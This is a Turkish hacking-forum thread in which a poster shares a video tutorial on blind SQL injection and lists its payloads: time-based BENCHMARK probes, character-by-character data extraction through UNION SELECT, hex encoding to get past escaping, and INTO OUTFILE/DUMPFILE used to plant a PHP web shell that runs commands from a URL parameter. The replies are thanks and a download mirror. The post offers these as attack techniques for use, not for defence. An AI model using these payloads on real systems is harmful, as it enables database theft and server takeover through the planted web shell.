




SQL Injection - Video Döküman (Temel, İleri Seviye)
-
Merhaba sevgili müridler,
Sizler için hazırladığım bu amatör videoda SQL Injectionın(Blind) çok fazla bilinmeyen yöntemlerini göstereceğim, umarım faydalı olur. İyi seylirler
Video Link : SQL INJECTION - VIDEO TUTORIAL ~ Tahribat.com Holyzone
EK(Videoda kullandığım sayfa)
#Blind ->Temel Seviye --> Matematik FLOOR (RAND() * 9999) ROUND(112,-1) --> Ekstra MD5('Tahribat.com') HEX('Tahribat.com') LENGTH(COMPRESS(REPEAT('TBT',1))) --> Benchmark (Zaman tabanlı SQL Injection) BENCHMARK(10000000,MD5(CHAR(99))) --> Veri toplamak ---> Tablo Sayısı COUNT(*) FROM tablo_adı ---> Alan FROM holyzone WHERE baslik LIKE "%holyzone%" -> İleri Seviye --> Outfile icerik FROM tablo_adı WHERE id= '1' INTO OUTFILE 'dir' --> Dumpfile INTO DUMPFILE 'dir' <?php system($_GET['cmd']);?> --> CHAR() --> Hash ayıklama baslik FROM holyzone WHERE id= '1' UNION SELECT IF(SUBSTRING(baslik,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null),2,3 FROM holyzone --> Escaping Bypassing #normal UNION SELECT 1,2,'tahribat.com' #bypassed UNION SELECT 1,2,0x74616872696261742e636f6d Ekstra kısmında nasıl hex kodu alacağınızı göstermiştim başına 0x eklemeyi unutmayın. /* Bu ve bunun gibi bir çok olayı SQL Injection aracılığı ile kolay bir şekilde yapmanız mümkündür :) */
-
helal selim, bize de böyle seyler lazım.
henüz izlemedim ama meraklısı olan arkadaslara faydalı olacagına adım gibi eminim.
-
eline sağlık dostum.
edit: şimdi izledim video yu helal on numara anlatım
-
Faydalı bir döküman.Eline sağlık hoca.
-
güzel gözüküyor holy eline sağlık
-
O textleri de istemeyi düşünüyodum videoyu izleyene kadar eklemişsin :) eline sağlık
-
çentük attım eyv güzel döküman
-
çok sağol eline sağlık adaş ;)
-
müzikte süpermiş :D afrikaya gittim
-
anakara bunu yazdı:
-----------------------------
müzikte süpermiş :D afrikaya gittim
-----------------------------:)
Sağolun müridler, SQL Injection dökümanları devam edecek.
-
Internete herzaman erisim olmuyor, benim gibi bilgisayara indirip izlemek isteyen arkadaslar icin : http://selimonder.com/dosya/video/sqli_1/SQL2.mp4
Ellerine saglik holyzone kardesim.